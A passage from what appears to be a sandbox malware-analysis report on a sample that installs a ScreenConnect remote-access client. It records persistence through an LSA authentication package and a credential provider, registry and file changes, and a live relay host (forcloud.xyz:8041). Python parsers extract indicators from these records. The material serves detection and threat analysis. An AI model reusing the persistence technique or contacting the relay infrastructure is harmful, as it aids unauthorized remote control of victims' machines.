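base64 starts with the DPAPI provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb) that can only be unprotected with the master key of the account that wrote it on that host, so it is ignored here.

```python
import base64
import hashlib
import struct
from urllib.parse import parse_qs

# Launch string copied from the ScreenConnect.ClientService.exe command line in
# the behavioral2 process list. The behavioral1 ImagePath carries the same
# fields plus a DPAPI-protected v= parameter, which this parser ignores.
LAUNCH_ARGS = (
    "?e=Access&y=Guest&h=forcloud.xyz&p=8041"
    "&s=92e7fd01-fc29-45eb-8a0d-d62071f48800"
    "&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1g"
    "RuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6h"
    "xkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1v"
    "Fx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4"
    "vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIO"
    "k%2bC5"
    "&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c="
)

PUBLICKEYBLOB = 0x06        # BLOBHEADER.bType for a CryptoAPI public key
CALG_RSA_KEYX = 0x0000A400  # BLOBHEADER.aiKeyAlg for an RSA key-exchange key


def parse_launch_args(args):
    """Split the ScreenConnect launch query string into named fields.

    parse_qs reverses the %2f / %2b escaping used inside the k= value;
    repeated c= keys are kept as a list so empty custom properties survive.
    """
    fields = parse_qs(args.lstrip("?"), keep_blank_values=True)
    return {
        "session_type": fields["e"][0],
        "process_type": fields["y"][0],
        "relay_host": fields["h"][0],
        "relay_port": int(fields["p"][0]),
        "session_id": fields["s"][0],
        "session_name": fields.get("t", [""])[0],
        "custom_properties": fields.get("c", []),
        "public_key_blob": base64.b64decode(fields["k"][0], validate=True),
    }


def parse_capi_rsa_public_blob(blob):
    """Decode a CryptoAPI PUBLICKEYBLOB: BLOBHEADER (8 bytes), RSAPUBKEY (12 bytes),
    then the modulus in little-endian byte order. The k= value is exactly this."""
    btype, bversion, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic, bit_len, pub_exp = struct.unpack_from("<4sII", blob, 8)
    if btype != PUBLICKEYBLOB or magic != b"RSA1":
        raise ValueError("not a CryptoAPI RSA public key blob")
    modulus_le = blob[20:20 + bit_len // 8]
    if len(modulus_le) != bit_len // 8:
        raise ValueError("modulus shorter than the declared key size")
    return {
        "blob_version": bversion,
        "alg_id": alg_id,
        "bits": bit_len,
        "exponent": pub_exp,
        "modulus": int.from_bytes(modulus_le, "little"),
        # Hash of the whole blob: a stable handle for the server key that still
        # matches across samples when the relay hostname changes.
        "fingerprint": hashlib.sha256(blob).hexdigest(),
    }


def extract_indicators(args):
    """Relay endpoint, session identity and server-key details from one launch string."""
    info = parse_launch_args(args)
    info["server_key"] = parse_capi_rsa_public_blob(info.pop("public_key_blob"))
    info["relay_endpoint"] = f'{info["relay_host"]}:{info["relay_port"]}'
    return info


if __name__ == "__main__":
    ioc = extract_indicators(LAUNCH_ARGS)
    key = ioc["server_key"]
    print("relay:     ", ioc["relay_endpoint"])
    print("session:   ", ioc["session_id"], ioc["session_name"])
    print("custom:    ", [c for c in ioc["custom_properties"] if c])
    print("server key:", f'RSA-{key["bits"]} e={key["exponent"]} sha256={key["fingerprint"]}')
```

The key fingerprint is the most durable indicator here: the relay host and session ID can be re-issued per build, but every client built from the same ScreenConnect instance carries the same server public key, so two samples with matching fingerprints were produced by the same operator-controlled server.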

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A
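The Authentication Packages value above is a REG_MULTI_SZ shown as a UTF-16LE hex dump, which hides the part that matters: the list now reads msv1_0 followed by the path to ScreenConnect.WindowsAuthenticationPackage.dll, a DLL that LSA will load into lsass.exe at every boot. The following Python is an added example, not part of the report. It decodes that dump (and the MuiCache LanguageList value from the Modifies data under HKEY_USERS table further down, which uses the same encoding) and lists every package other than the stock msv1_0. DEFAULT_AUTH_PACKAGES is the editor's assumption about what a clean Windows install carries in this value.

```python
# Hex dump of HKLM\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages as
# written by msiexec.exe, copied from the signature row above and split at
# character boundaries for readability (REG_MULTI_SZ, UTF-16LE).
AUTH_PACKAGES_HEX = (
    "6d007300760031005f0030000000"                                  # "msv1_0" NUL
    "43003a005c00"                                                  # "C:\"
    "500072006f006700720061006d002000460069006c0065007300"          # "Program Files"
    "2000280078003800360029005c00"                                  # " (x86)\"
    "530063007200650065006e0043006f006e006e00650063007400"          # "ScreenConnect"
    "200043006c00690065006e0074002000"                              # " Client "
    "2800320030006100650031003000310063006500660030006600310061006300660029005c00"  # "(20ae101cef0f1acf)\"
    "530063007200650065006e0043006f006e006e006500630074002e00"      # "ScreenConnect."
    "570069006e0064006f0077007300"                                  # "Windows"
    "410075007400680065006e007400690063006100740069006f006e00"      # "Authentication"
    "5000610063006b006100670065002e0064006c006c00"                  # "Package.dll"
    "00000000"                                                      # NUL + list terminator
)

# MuiCache LanguageList value written by DrvInst.exe in the same detonation.
LANGUAGE_LIST_HEX = "65006e002d0055005300000065006e0000000000"

# Assumption: the only package present in this value on a clean Windows install.
# Anything else is a DLL that lsass.exe loads with SYSTEM privileges at boot.
DEFAULT_AUTH_PACKAGES = {"msv1_0"}


def decode_multi_sz(hex_value):
    """REG_MULTI_SZ: UTF-16LE strings, each NUL-terminated, closed by an empty string."""
    raw = bytes.fromhex(hex_value)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE")
    text = raw.decode("utf-16-le").rstrip("\x00")  # drop the list terminator
    return text.split("\x00") if text else []


def unexpected_auth_packages(entries):
    """Entries that are not the stock MSV1_0 package (compared case-insensitively)."""
    return [e for e in entries if e.lower() not in DEFAULT_AUTH_PACKAGES]


if __name__ == "__main__":
    packages = decode_multi_sz(AUTH_PACKAGES_HEX)
    for p in packages:
        print("auth package:", p)
    for p in unexpected_auth_packages(packages):
        print("NON-DEFAULT :", p)
    print("LanguageList:", decode_multi_sz(LANGUAGE_LIST_HEX))
```

The same decoder applies to any REG_MULTI_SZ the sandbox renders as hex; for this key the thing to act on is the second entry, since an LSA authentication package runs inside lsass.exe and survives reinstalling the service.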

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7829a0.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7829a1.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7829a1.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f7829a0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2EDE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI33B1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\MSI2D76.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7829a3.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open C:\Windows\system32\msiexec.exe N/A
